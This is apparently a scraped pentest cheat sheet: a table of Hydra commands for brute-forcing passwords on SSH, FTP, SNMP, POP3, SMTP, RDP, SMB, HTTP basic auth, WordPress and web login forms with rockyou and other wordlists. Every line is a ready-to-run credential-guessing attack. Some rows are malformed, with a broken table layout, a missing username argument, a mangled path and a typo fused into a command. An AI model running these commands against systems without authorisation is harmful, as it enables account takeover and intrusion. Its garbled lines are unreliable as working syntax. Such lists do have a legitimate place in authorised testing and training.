| Command | Description |
| hydra -P password-file.txt -v $ip snmp | Brute force against SNMP |
| hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp | FTP known user and rockyou password list |
| hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh | SSH using list of users and passwords |
| hydra -v -V -u -L users.txt -p “” -t 1 -u $ip ssh | SSH using a known password and a username list |
| hydra $ip -s 22 ssh -l -P big_wordlist.txt | SSH Against Known username on port 22 |
| hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V | POP3 Brute Force |
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V | SMTP Brute Force |
| hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin | Attack http get 401 login with a dictionary |
| hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip | Attack Windows Remote Desktop with rockyou |
| hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb | Brute force SMB user with rockyou: |
| hydra -l admin -P ./passwordlist.txt $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’ | Brute force a WordPress admin login |
get reqeusthydra -l admin -P /root/Desktop/wordlists/test.txt dvwa http-get-form "//index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."
post request
hydra -L usernames.txt -P rockyou.txt http-post-form "/loginCheck.php:username=^USER^&password=^PASS^:F=invalid" -f
Recente reacties